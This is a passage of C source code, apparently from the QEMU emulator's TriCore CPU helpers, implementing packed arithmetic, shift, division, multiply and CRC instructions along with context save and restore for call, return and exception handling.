16); \ ret = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret = ret & 0xffff; \ \ extr_r1 = sextract32(r1, 16, 16); \ extr_r2 = sextract32(r2, 16, 16); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= extr_r1 << 16; \ \ return ret; \ } \ \ uint32_t helper_##name ##_hu(target_ulong r1, target_ulong r2)\ { \ uint32_t extr_r1, extr_r2; \ uint32_t ret = 0; \ \ extr_r1 = extract32(r1, 0, 16); \ extr_r2 = extract32(r2, 0, 16); \ ret = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret = ret & 0xffff; \ \ extr_r1 = extract32(r1, 16, 16); \ extr_r2 = extract32(r2, 16, 16); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= extr_r1 << (16); \ \ return ret; \ } \ \ uint64_t helper_ix##name(uint64_t r1, uint32_t r2) \ { \ int64_t r2l, r2h, r1hl; \ uint64_t ret = 0; \ \ ret = ((r1 + 2) & 0xffff); \ r2l = sextract64(r2, 0, 16); \ r2h = sextract64(r2, 16, 16); \ r1hl = sextract64(r1, 32, 16); \ \ if ((r2l op ## = r2h) && (r2l op r1hl)) { \ ret |= (r2l & 0xffff) << 32; \ ret |= extract64(r1, 0, 16) << 16; \ } else if ((r2h op r2l) && (r2h op r1hl)) { \ ret |= extract64(r2, 16, 16) << 32; \ ret |= extract64(r1 + 1, 0, 16) << 16; \ } else { \ ret |= r1 & 0xffffffff0000ull; \ } \ return ret; \ } \ \ uint64_t helper_ix##name ##_u(uint64_t r1, uint32_t r2) \ { \ int64_t r2l, r2h, r1hl; \ uint64_t ret = 0; \ \ ret = ((r1 + 2) & 0xffff); \ r2l = extract64(r2, 0, 16); \ r2h = extract64(r2, 16, 16); \ r1hl = extract64(r1, 32, 16); \ \ if ((r2l op ## = r2h) && (r2l op r1hl)) { \ ret |= (r2l & 0xffff) << 32; \ ret |= extract64(r1, 0, 16) << 16; \ } else if ((r2h op r2l) && (r2h op r1hl)) { \ ret |= extract64(r2, 16, 16) << 32; \ ret |= extract64(r1 + 1, 0, 16) << 16; \ } else { \ ret |= r1 & 0xffffffff0000ull; \ } \ return ret; \ } EXTREMA_H_B(max, >) EXTREMA_H_B(min, <) #undef EXTREMA_H_B uint32_t helper_clo_h(target_ulong r1) { uint32_t ret_hw0 = extract32(r1, 0, 16); uint32_t ret_hw1 = extract32(r1, 16, 16); ret_hw0 = clo32(ret_hw0 << 16); ret_hw1 = clo32(ret_hw1 << 16); if (ret_hw0 > 16) { ret_hw0 = 16; } if (ret_hw1 > 16) { ret_hw1 = 16; } return ret_hw0 | (ret_hw1 << 16); } uint32_t helper_clz_h(target_ulong r1) { uint32_t ret_hw0 = extract32(r1, 0, 16); uint32_t ret_hw1 = extract32(r1, 16, 16); ret_hw0 = clz32(ret_hw0 << 16); ret_hw1 = clz32(ret_hw1 << 16); if (ret_hw0 > 16) { ret_hw0 = 16; } if (ret_hw1 > 16) { ret_hw1 = 16; } return ret_hw0 | (ret_hw1 << 16); } uint32_t helper_cls_h(target_ulong r1) { uint32_t ret_hw0 = extract32(r1, 0, 16); uint32_t ret_hw1 = extract32(r1, 16, 16); ret_hw0 = clrsb32(ret_hw0 << 16); ret_hw1 = clrsb32(ret_hw1 << 16); if (ret_hw0 > 15) { ret_hw0 = 15; } if (ret_hw1 > 15) { ret_hw1 = 15; } return ret_hw0 | (ret_hw1 << 16); } uint32_t helper_sh(target_ulong r1, target_ulong r2) { int32_t shift_count = sextract32(r2, 0, 6); if (shift_count == -32) { return 0; } else if (shift_count < 0) { return r1 >> -shift_count; } else { return r1 << shift_count; } } uint32_t helper_sh_h(target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; int32_t shift_count; shift_count = sextract32(r2, 0, 5); if (shift_count == -16) { return 0; } else if (shift_count < 0) { ret_hw0 = extract32(r1, 0, 16) >> -shift_count; ret_hw1 = extract32(r1, 16, 16) >> -shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } else { ret_hw0 = extract32(r1, 0, 16) << shift_count; ret_hw1 = extract32(r1, 16, 16) << shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } } uint32_t helper_sha(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t shift_count; int64_t result, t1; uint32_t ret; shift_count = sextract32(r2, 0, 6); t1 = sextract32(r1, 0, 32); if (shift_count == 0) { env->PSW_USB_C = env->PSW_USB_V = 0; ret = r1; } else if (shift_count == -32) { env->PSW_USB_C = r1; env->PSW_USB_V = 0; ret = t1 >> 31; } else if (shift_count > 0) { result = t1 << shift_count; /* calc carry */ env->PSW_USB_C = ((result & 0xffffffff00000000ULL) != 0); /* calc v */ env->PSW_USB_V = (((result > 0x7fffffffLL) || (result < -0x80000000LL)) << 31); /* calc sv */ env->PSW_USB_SV |= env->PSW_USB_V; ret = (uint32_t)result; } else { env->PSW_USB_V = 0; env->PSW_USB_C = (r1 & ((1 << -shift_count) - 1)); ret = t1 >> -shift_count; } env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_sha_h(target_ulong r1, target_ulong r2) { int32_t shift_count; int32_t ret_hw0, ret_hw1; shift_count = sextract32(r2, 0, 5); if (shift_count == 0) { return r1; } else if (shift_count < 0) { ret_hw0 = sextract32(r1, 0, 16) >> -shift_count; ret_hw1 = sextract32(r1, 16, 16) >> -shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } else { ret_hw0 = sextract32(r1, 0, 16) << shift_count; ret_hw1 = sextract32(r1, 16, 16) << shift_count; return (ret_hw0 & 0xffff) | (ret_hw1 << 16); } } uint32_t helper_bmerge(target_ulong r1, target_ulong r2) { uint32_t i, ret; ret = 0; for (i = 0; i < 16; i++) { ret |= (r1 & 1) << (2 * i + 1); ret |= (r2 & 1) << (2 * i); r1 = r1 >> 1; r2 = r2 >> 1; } return ret; } uint64_t helper_bsplit(uint32_t r1) { int32_t i; uint64_t ret; ret = 0; for (i = 0; i < 32; i = i + 2) { /* even */ ret |= (r1 & 1) << (i/2); r1 = r1 >> 1; /* odd */ ret |= (uint64_t)(r1 & 1) << (i/2 + 32); r1 = r1 >> 1; } return ret; } uint32_t helper_parity(target_ulong r1) { uint32_t ret; uint32_t nOnes, i; ret = 0; nOnes = 0; for (i = 0; i < 8; i++) { ret ^= (r1 & 1); r1 = r1 >> 1; } /* second byte */ nOnes = 0; for (i = 0; i < 8; i++) { nOnes ^= (r1 & 1); r1 = r1 >> 1; } ret |= nOnes << 8; /* third byte */ nOnes = 0; for (i = 0; i < 8; i++) { nOnes ^= (r1 & 1); r1 = r1 >> 1; } ret |= nOnes << 16; /* fourth byte */ nOnes = 0; for (i = 0; i < 8; i++) { nOnes ^= (r1 & 1); r1 = r1 >> 1; } ret |= nOnes << 24; return ret; } uint32_t helper_pack(uint32_t carry, uint32_t r1_low, uint32_t r1_high, target_ulong r2) { uint32_t ret; int32_t fp_exp, fp_frac, temp_exp, fp_exp_frac; int32_t int_exp = r1_high; int32_t int_mant = r1_low; uint32_t flag_rnd = (int_mant & (1 << 7)) && ( (int_mant & (1 << 8)) || (int_mant & 0x7f) || (carry != 0)); if (((int_mant & (1<<31)) == 0) && (int_exp == 255)) { fp_exp = 255; fp_frac = extract32(int_mant, 8, 23); } else if ((int_mant & (1<<31)) && (int_exp >= 127)) { fp_exp = 255; fp_frac = 0; } else if ((int_mant & (1<<31)) && (int_exp <= -128)) { fp_exp = 0; fp_frac = 0; } else if (int_mant == 0) { fp_exp = 0; fp_frac = 0; } else { if (((int_mant & (1 << 31)) == 0)) { temp_exp = 0; } else { temp_exp = int_exp + 128; } fp_exp_frac = (((temp_exp & 0xff) << 23) | extract32(int_mant, 8, 23)) + flag_rnd; fp_exp = extract32(fp_exp_frac, 23, 8); fp_frac = extract32(fp_exp_frac, 0, 23); } ret = r2 & (1 << 31); ret = ret + (fp_exp << 23); ret = ret + (fp_frac & 0x7fffff); return ret; } uint64_t helper_unpack(target_ulong arg1) { int32_t fp_exp = extract32(arg1, 23, 8); int32_t fp_frac = extract32(arg1, 0, 23); uint64_t ret; int32_t int_exp, int_mant; if (fp_exp == 255) { int_exp = 255; int_mant = (fp_frac << 7); } else if ((fp_exp == 0) && (fp_frac == 0)) { int_exp = -127; int_mant = 0; } else if ((fp_exp == 0) && (fp_frac != 0)) { int_exp = -126; int_mant = (fp_frac << 7); } else { int_exp = fp_exp - 127; int_mant = (fp_frac << 7); int_mant |= (1 << 30); } ret = int_exp; ret = ret << 32; ret |= int_mant; return ret; } uint64_t helper_dvinit_b_13(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret; int32_t abs_sig_dividend, abs_divisor; ret = sextract32(r1, 0, 32); ret = ret << 24; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffffff; } abs_sig_dividend = abs((int32_t)r1) >> 8; abs_divisor = abs((int32_t)r2); /* calc overflow ofv if (a/b >= 255) <=> (a/255 >= b) */ env->PSW_USB_V = (abs_sig_dividend >= abs_divisor) << 31; env->PSW_USB_V = env->PSW_USB_V << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvinit_b_131(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret = sextract32(r1, 0, 32); ret = ret << 24; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffffff; } /* calc overflow */ env->PSW_USB_V = ((r2 == 0) || ((r2 == 0xffffffff) && (r1 == 0xffffff80))); env->PSW_USB_V = env->PSW_USB_V << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvinit_h_13(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret; int32_t abs_sig_dividend, abs_divisor; ret = sextract32(r1, 0, 32); ret = ret << 16; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffff; } abs_sig_dividend = abs((int32_t)r1) >> 16; abs_divisor = abs((int32_t)r2); /* calc overflow ofv if (a/b >= 0xffff) <=> (a/0xffff >= b) */ env->PSW_USB_V = (abs_sig_dividend >= abs_divisor) << 31; env->PSW_USB_V = env->PSW_USB_V << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvinit_h_131(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint64_t ret = sextract32(r1, 0, 32); ret = ret << 16; if (!((r1 & 0x80000000) == (r2 & 0x80000000))) { ret |= 0xffff; } /* calc overflow */ env->PSW_USB_V = ((r2 == 0) || ((r2 == 0xffffffff) && (r1 == 0xffff8000))); env->PSW_USB_V = env->PSW_USB_V << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ret; } uint64_t helper_dvadj(uint64_t r1, uint32_t r2) { int32_t x_sign = (r1 >> 63); int32_t q_sign = x_sign ^ (r2 >> 31); int32_t eq_pos = x_sign & ((r1 >> 32) == r2); int32_t eq_neg = x_sign & ((r1 >> 32) == -r2); uint32_t quotient; uint64_t remainder; if ((q_sign & ~eq_neg) | eq_pos) { quotient = (r1 + 1) & 0xffffffff; } else { quotient = r1 & 0xffffffff; } if (eq_pos | eq_neg) { remainder = 0; } else { remainder = (r1 & 0xffffffff00000000ull); } return remainder | quotient; } uint64_t helper_dvstep(uint64_t r1, uint32_t r2) { int32_t dividend_sign = extract64(r1, 63, 1); int32_t divisor_sign = extract32(r2, 31, 1); int32_t quotient_sign = (dividend_sign != divisor_sign); int32_t addend, dividend_quotient, remainder; int32_t i, temp; if (quotient_sign) { addend = r2; } else { addend = -r2; } dividend_quotient = (int32_t)r1; remainder = (int32_t)(r1 >> 32); for (i = 0; i < 8; i++) { remainder = (remainder << 1) | extract32(dividend_quotient, 31, 1); dividend_quotient <<= 1; temp = remainder + addend; if ((temp < 0) == dividend_sign) { remainder = temp; } if (((temp < 0) == dividend_sign)) { dividend_quotient = dividend_quotient | !quotient_sign; } else { dividend_quotient = dividend_quotient | quotient_sign; } } return ((uint64_t)remainder << 32) | (uint32_t)dividend_quotient; } uint64_t helper_dvstep_u(uint64_t r1, uint32_t r2) { int32_t dividend_quotient = extract64(r1, 0, 32); int64_t remainder = extract64(r1, 32, 32); int32_t i; int64_t temp; for (i = 0; i < 8; i++) { remainder = (remainder << 1) | extract32(dividend_quotient, 31, 1); dividend_quotient <<= 1; temp = (remainder & 0xffffffff) - r2; if (temp >= 0) { remainder = temp; } dividend_quotient = dividend_quotient | !(temp < 0); } return ((uint64_t)remainder << 32) | (uint32_t)dividend_quotient; } uint64_t helper_divide(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { int32_t quotient, remainder; int32_t dividend = (int32_t)r1; int32_t divisor = (int32_t)r2; if (divisor == 0) { if (dividend >= 0) { quotient = 0x7fffffff; remainder = 0; } else { quotient = 0x80000000; remainder = 0; } env->PSW_USB_V = (1 << 31); } else if ((divisor == 0xffffffff) && (dividend == 0x80000000)) { quotient = 0x7fffffff; remainder = 0; env->PSW_USB_V = (1 << 31); } else { remainder = dividend % divisor; quotient = (dividend - remainder)/divisor; env->PSW_USB_V = 0; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ((uint64_t)remainder << 32) | (uint32_t)quotient; } uint64_t helper_divide_u(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t quotient, remainder; uint32_t dividend = r1; uint32_t divisor = r2; if (divisor == 0) { quotient = 0xffffffff; remainder = 0; env->PSW_USB_V = (1 << 31); } else { remainder = dividend % divisor; quotient = (dividend - remainder)/divisor; env->PSW_USB_V = 0; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = 0; return ((uint64_t)remainder << 32) | quotient; } uint64_t helper_mul_h(uint32_t arg00, uint32_t arg01, uint32_t arg10, uint32_t arg11, uint32_t n) { uint32_t result0, result1; int32_t sc1 = ((arg00 & 0xffff) == 0x8000) && ((arg10 & 0xffff) == 0x8000) && (n == 1); int32_t sc0 = ((arg01 & 0xffff) == 0x8000) && ((arg11 & 0xffff) == 0x8000) && (n == 1); if (sc1) { result1 = 0x7fffffff; } else { result1 = (((uint32_t)(arg00 * arg10)) << n); } if (sc0) { result0 = 0x7fffffff; } else { result0 = (((uint32_t)(arg01 * arg11)) << n); } return (((uint64_t)result1 << 32)) | result0; } uint64_t helper_mulm_h(uint32_t arg00, uint32_t arg01, uint32_t arg10, uint32_t arg11, uint32_t n) { uint64_t ret; int64_t result0, result1; int32_t sc1 = ((arg00 & 0xffff) == 0x8000) && ((arg10 & 0xffff) == 0x8000) && (n == 1); int32_t sc0 = ((arg01 & 0xffff) == 0x8000) && ((arg11 & 0xffff) == 0x8000) && (n == 1); if (sc1) { result1 = 0x7fffffff; } else { result1 = (((int32_t)arg00 * (int32_t)arg10) << n); } if (sc0) { result0 = 0x7fffffff; } else { result0 = (((int32_t)arg01 * (int32_t)arg11) << n); } ret = (result1 + result0); ret = ret << 16; return ret; } uint32_t helper_mulr_h(uint32_t arg00, uint32_t arg01, uint32_t arg10, uint32_t arg11, uint32_t n) { uint32_t result0, result1; int32_t sc1 = ((arg00 & 0xffff) == 0x8000) && ((arg10 & 0xffff) == 0x8000) && (n == 1); int32_t sc0 = ((arg01 & 0xffff) == 0x8000) && ((arg11 & 0xffff) == 0x8000) && (n == 1); if (sc1) { result1 = 0x7fffffff; } else { result1 = ((arg00 * arg10) << n) + 0x8000; } if (sc0) { result0 = 0x7fffffff; } else { result0 = ((arg01 * arg11) << n) + 0x8000; } return (result1 & 0xffff0000) | (result0 >> 16); } uint32_t helper_crc32(uint32_t arg0, uint32_t arg1) { uint8_t buf[4]; stl_be_p(buf, arg0); return crc32(arg1, buf, 4); } /* context save area (CSA) related helpers */ static int cdc_increment(target_ulong *psw) { if ((*psw & MASK_PSW_CDC) == 0x7f) { return 0; } (*psw)++; /* check for overflow */ int lo = clo32((*psw & MASK_PSW_CDC) << (32 - 7)); int mask = (1u << (7 - lo)) - 1; int count = *psw & mask; if (count == 0) { (*psw)--; return 1; } return 0; } static int cdc_decrement(target_ulong *psw) { if ((*psw & MASK_PSW_CDC) == 0x7f) { return 0; } /* check for underflow */ int lo = clo32((*psw & MASK_PSW_CDC) << (32 - 7)); int mask = (1u << (7 - lo)) - 1; int count = *psw & mask; if (count == 0) { return 1; } (*psw)--; return 0; } static bool cdc_zero(target_ulong *psw) { int cdc = *psw & MASK_PSW_CDC; /* Returns TRUE if PSW.CDC.COUNT == 0 or if PSW.CDC == 7'b1111111, otherwise returns FALSE. */ if (cdc == 0x7f) { return true; } /* find CDC.COUNT */ int lo = clo32((*psw & MASK_PSW_CDC) << (32 - 7)); int mask = (1u << (7 - lo)) - 1; int count = *psw & mask; return count == 0; } static void save_context_upper(CPUTriCoreState *env, int ea) { cpu_stl_data(env, ea, env->PCXI); cpu_stl_data(env, ea+4, psw_read(env)); cpu_stl_data(env, ea+8, env->gpr_a[10]); cpu_stl_data(env, ea+12, env->gpr_a[11]); cpu_stl_data(env, ea+16, env->gpr_d[8]); cpu_stl_data(env, ea+20, env->gpr_d[9]); cpu_stl_data(env, ea+24, env->gpr_d[10]); cpu_stl_data(env, ea+28, env->gpr_d[11]); cpu_stl_data(env, ea+32, env->gpr_a[12]); cpu_stl_data(env, ea+36, env->gpr_a[13]); cpu_stl_data(env, ea+40, env->gpr_a[14]); cpu_stl_data(env, ea+44, env->gpr_a[15]); cpu_stl_data(env, ea+48, env->gpr_d[12]); cpu_stl_data(env, ea+52, env->gpr_d[13]); cpu_stl_data(env, ea+56, env->gpr_d[14]); cpu_stl_data(env, ea+60, env->gpr_d[15]); } static void save_context_lower(CPUTriCoreState *env, int ea) { cpu_stl_data(env, ea, env->PCXI); cpu_stl_data(env, ea+4, env->gpr_a[11]); cpu_stl_data(env, ea+8, env->gpr_a[2]); cpu_stl_data(env, ea+12, env->gpr_a[3]); cpu_stl_data(env, ea+16, env->gpr_d[0]); cpu_stl_data(env, ea+20, env->gpr_d[1]); cpu_stl_data(env, ea+24, env->gpr_d[2]); cpu_stl_data(env, ea+28, env->gpr_d[3]); cpu_stl_data(env, ea+32, env->gpr_a[4]); cpu_stl_data(env, ea+36, env->gpr_a[5]); cpu_stl_data(env, ea+40, env->gpr_a[6]); cpu_stl_data(env, ea+44, env->gpr_a[7]); cpu_stl_data(env, ea+48, env->gpr_d[4]); cpu_stl_data(env, ea+52, env->gpr_d[5]); cpu_stl_data(env, ea+56, env->gpr_d[6]); cpu_stl_data(env, ea+60, env->gpr_d[7]); } static void restore_context_upper(CPUTriCoreState *env, int ea, target_ulong *new_PCXI, target_ulong *new_PSW) { *new_PCXI = cpu_ldl_data(env, ea); *new_PSW = cpu_ldl_data(env, ea+4); env->gpr_a[10] = cpu_ldl_data(env, ea+8); env->gpr_a[11] = cpu_ldl_data(env, ea+12); env->gpr_d[8] = cpu_ldl_data(env, ea+16); env->gpr_d[9] = cpu_ldl_data(env, ea+20); env->gpr_d[10] = cpu_ldl_data(env, ea+24); env->gpr_d[11] = cpu_ldl_data(env, ea+28); env->gpr_a[12] = cpu_ldl_data(env, ea+32); env->gpr_a[13] = cpu_ldl_data(env, ea+36); env->gpr_a[14] = cpu_ldl_data(env, ea+40); env->gpr_a[15] = cpu_ldl_data(env, ea+44); env->gpr_d[12] = cpu_ldl_data(env, ea+48); env->gpr_d[13] = cpu_ldl_data(env, ea+52); env->gpr_d[14] = cpu_ldl_data(env, ea+56); env->gpr_d[15] = cpu_ldl_data(env, ea+60); } static void restore_context_lower(CPUTriCoreState *env, int ea, target_ulong *ra, target_ulong *pcxi) { *pcxi = cpu_ldl_data(env, ea); *ra = cpu_ldl_data(env, ea+4); env->gpr_a[2] = cpu_ldl_data(env, ea+8); env->gpr_a[3] = cpu_ldl_data(env, ea+12); env->gpr_d[0] = cpu_ldl_data(env, ea+16); env->gpr_d[1] = cpu_ldl_data(env, ea+20); env->gpr_d[2] = cpu_ldl_data(env, ea+24); env->gpr_d[3] = cpu_ldl_data(env, ea+28); env->gpr_a[4] = cpu_ldl_data(env, ea+32); env->gpr_a[5] = cpu_ldl_data(env, ea+36); env->gpr_a[6] = cpu_ldl_data(env, ea+40); env->gpr_a[7] = cpu_ldl_data(env, ea+44); env->gpr_d[4] = cpu_ldl_data(env, ea+48); env->gpr_d[5] = cpu_ldl_data(env, ea+52); env->gpr_d[6] = cpu_ldl_data(env, ea+56); env->gpr_d[7] = cpu_ldl_data(env, ea+60); } void helper_call(CPUTriCoreState *env, uint32_t next_pc) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; target_ulong psw; psw = psw_read(env); /* if (FCX == 0) trap(FCU); */ if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } /* if (PSW.CDE) then if (cdc_increment()) then trap(CDO); */ if (psw & MASK_PSW_CDE) { if (cdc_increment(&psw)) { /* CDO trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CDO, GETPC()); } } /* PSW.CDE = 1;*/ psw |= MASK_PSW_CDE; /* tmp_FCX = FCX; */ tmp_FCX = env->FCX; /* EA = {FCX.FCXS, 6'b0, FCX.FCXO, 6'b0}; */ ea = ((env->FCX & MASK_FCX_FCXS) << 12) + ((env->FCX & MASK_FCX_FCXO) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]}; */ save_context_upper(env, ea); /* PCXI.PCPN = ICR.CCPN; */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE; */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 1; */ env->PCXI |= MASK_PCXI_UL; /* PCXI[19: 0] = FCX[19: 0]; */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FCX[19: 0] = new_FCX[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* A[11] = next_pc[31: 0]; */ env->gpr_a[11] = next_pc; /* if (tmp_FCX == LCX) trap(FCD);*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } psw_write(env, psw); } void helper_ret(CPUTriCoreState *env) { target_ulong ea; target_ulong new_PCXI; target_ulong new_PSW, psw; psw = psw_read(env); /* if (PSW.CDE) then if (cdc_decrement()) then trap(CDU);*/ if (psw & MASK_PSW_CDE) { if (cdc_decrement(&psw)) { /* CDU trap */ psw_write(env, psw); raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CDU, GETPC()); } } /* if (PCXI[19: 0] == 0) then trap(CSU); */ if ((env->PCXI & 0xfffff) == 0) { /* CSU trap */ psw_write(env, psw); raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CSU, GETPC()); } /* if (PCXI.UL == 0) then trap(CTYP); */ if ((env->PCXI & MASK_PCXI_UL) == 0) { /* CTYP trap */ cdc_increment(&psw); /* restore to the start of helper */ psw_write(env, psw); raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CTYP, GETPC()); } /* PC = {A11 [31: 1], 1’b0}; */ env->PC = env->gpr_a[11] & 0xfffffffe; /* EA = {PCXI.PCXS, 6'b0, PCXI.PCXO, 6'b0}; */ ea = ((env->PCXI & MASK_PCXI_PCXS) << 12) + ((env->PCXI & MASK_PCXI_PCXO) << 6); /* {new_PCXI, new_PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]} = M(EA, 16 * word); */ restore_context_upper(env, ea, &new_PCXI, &new_PSW); /* M(EA, word) = FCX; */ cpu_stl_data(env, ea, env->FCX); /* FCX[19: 0] = PCXI[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (env->PCXI & 0x000fffff); /* PCXI = new_PCXI; */ env->PCXI = new_PCXI; if (tricore_feature(env, TRICORE_FEATURE_13)) { /* PSW = new_PSW */ psw_write(env, new_PSW); } else { /* PSW = {new_PSW[31:26], PSW[25:24], new_PSW[23:0]}; */ psw_write(env, (new_PSW & ~(0x3000000)) + (psw & (0x3000000))); } } void helper_bisr(CPUTriCoreState *env, uint32_t const9) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } tmp_FCX = env->FCX; ea = ((env->FCX & 0xf0000) << 12) + ((env->FCX & 0xffff) << 6); /* new_FCX = M(EA, word); */ new_FCX = cpu_ldl_data(env, ea); /* M(EA, 16 * word) = {PCXI, A[11], A[2], A[3], D[0], D[1], D[2], D[3], A[4] , A[5], A[6], A[7], D[4], D[5], D[6], D[7]}; */ save_context_lower(env, ea); /* PCXI.PCPN = ICR.CCPN */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* PCXI.PIE = ICR.IE */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.UL = 0 */ env->PCXI &= ~(MASK_PCXI_UL); /* PCXI[19: 0] = FCX[19: 0] */ env->PCXI = (env->PCXI & 0xfff00000) + (env->FCX & 0xfffff); /* FXC[19: 0] = new_FCX[19: 0] */ env->FCX = (env->FCX & 0xfff00000) + (new_FCX & 0xfffff); /* ICR.IE = 1 */ env->ICR |= MASK_ICR_IE_1_3; env->ICR |= const9; /* ICR.CCPN = const9[7: 0];*/ if (tmp_FCX == env->LCX) { /* FCD trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCD, GETPC()); } } void helper_rfe(CPUTriCoreState *env) { target_ulong ea; target_ulong new_PCXI; target_ulong new_PSW; /* if (PCXI[19: 0] == 0) then trap(CSU); */ if ((env->PCXI & 0xfffff) == 0) { /* raise csu trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CSU, GETPC()); } /* if (PCXI.UL == 0) then trap(CTYP); */ if ((env->PCXI & MASK_PCXI_UL) == 0) { /* raise CTYP trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_CTYP, GETPC()); } /* if (!cdc_zero() AND PSW.CDE) then trap(NEST); */ if (!cdc_zero(&(env->PSW)) && (env->PSW & MASK_PSW_CDE)) { /* raise NEST trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_NEST, GETPC()); } env->PC = env->gpr_a[11] & ~0x1; /* ICR.IE = PCXI.PIE; */ env->ICR = (env->ICR & ~MASK_ICR_IE_1_3) + ((env->PCXI & MASK_PCXI_PIE_1_3) >> 15); /* ICR.CCPN = PCXI.PCPN; */ env->ICR = (env->ICR & ~MASK_ICR_CCPN) + ((env->PCXI & MASK_PCXI_PCPN) >> 24); /*EA = {PCXI.PCXS, 6'b0, PCXI.PCXO, 6'b0};*/ ea = ((env->PCXI & MASK_PCXI_PCXS) << 12) + ((env->PCXI & MASK_PCXI_PCXO) << 6); /*{new_PCXI, PSW, A[10], A[11], D[8], D[9], D[10], D[11], A[12], A[13], A[14], A[15], D[12], D[13], D[14], D[15]} = M(EA, 16 * word); */ restore_context_upper(env, ea, &new_PCXI, &new_PSW); /* M(EA, word) = FCX;*/ cpu_stl_data(env, ea, env->FCX); /* FCX[19: 0] = PCXI[19: 0]; */ env->FCX = (env->FCX & 0xfff00000) + (env->PCXI & 0x000fffff); /* PCXI = new_PCXI; */ env->PCXI = new_PCXI; /* write psw */ psw_write(env, new_PSW); } void helper_rfm(CPUTriCoreState *env) { env->PC = (env->gpr_a[11] & ~0x1); /* ICR.IE = PCXI.PIE; */ env->ICR = (env->ICR & ~MASK_ICR_IE_1_3) | ((env->PCXI & MASK_PCXI_PIE_1_3) >> 15); /* ICR.CCPN = PCXI.PCPN; */ env->ICR = (env->ICR & ~MASK_ICR_CCPN) | ((env->PCXI & MASK_PCXI_PCPN) >> 24); /* {PCXI, PSW, A[10], A[11]} = M(DCX, 4 * word); */ env->PCXI = cpu_ldl_data(env, env->DCX); psw_write(env, cpu_ldl_data(env, env->DCX+4)); env->gpr_a[10] = cpu_ldl_data(env, env->DCX+8); env->gpr_a[11] = cpu_ldl_data(env, env->DCX+12); if (tricore_feature(env, TRICORE_FEATURE_131)) { env->DBGTCR = 0; } } void helper_ldlcx(CPUTriCoreState *env, uint32_t ea) { uint32_t dummy; /* insn doesn't load PCXI and RA */ restore_context_lower(env, ea, &dummy, &dummy); } void helper_lducx(CPUTriCoreState *env, uint32_t ea) { uint32_t dummy; /* insn doesn't load PCXI and PSW */ restore_context_upper(env, ea, &dummy, &dummy); } void helper_stlcx(CPUTriCoreState *env, uint32_t ea) { save_context_lower(env, ea); } void helper_stucx(CPUTriCoreState *env, uint32_t ea) { save_context_upper(env, ea); } void helper_svlcx(CPUTriCoreState *env) { target_ulong tmp_FCX; target_ulong ea; target_ulong new_FCX; if (env->FCX == 0) { /* FCU trap */ raise_exception_sync_helper(env, TRAPC_CTX_MNG, TIN3_FCU, GETPC()); } /* tmp_FCX = FCX; */ tmp_FCX = env->FCX; /* EA = {FCX.FCXS, 6'b0, FCX.FCXO, 6'b0}; */ ea = ((env->FCX & MASK_FCX_FCXS) << 